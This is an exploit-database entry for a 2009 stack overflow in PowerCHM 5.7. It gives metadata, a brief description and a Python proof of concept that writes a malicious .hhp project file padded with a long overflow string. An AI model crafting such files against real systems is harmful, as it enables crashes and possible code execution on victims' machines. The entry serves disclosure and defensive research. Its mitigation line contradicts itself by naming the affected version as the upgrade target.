header-logo
Suggest Exploit
vendor:
PowerCHM
by:
Encrypt3d.M!nd
9.3
CVSS
HIGH
Stack overflow
119
CWE
Product Name: PowerCHM
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:powerchm:powerchm:5.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

PowerCHM 5.7 (hhp file) Stack overflow PoC

PowerCHM 5.7 is vulnerable to a stack overflow vulnerability when a specially crafted hhp file is opened. The vulnerability is caused due to a boundary error when handling the 'Title' field of the hhp file. This can be exploited to cause a stack-based buffer overflow via an overly long string.

Mitigation:

Upgrade to the latest version of PowerCHM 5.7
Source

Exploit-DB raw data:

# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Orginally Discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#

header = (
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=aaaaaa.hhc\n"
"Index file=aaaaaa.hhk\n"
"Language=0x813 Dutch (Belgium)\n"
"Title=\n"
"Error log file=Errlog.txt\n"
"Default Window=main\n\n"
"[WINDOWS]\n"
'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n'
"[FILES]\n\n"
"[INFOTYPES]\n")

file=open('poc.hhp','w')
file.write(header+"\x41"*999+"\x42\x42\x42\x42"+"\x43"*500)
file.close()

# milw0rm.com [2009-03-27]

Navigation

Suggest Exploit

Services By CQR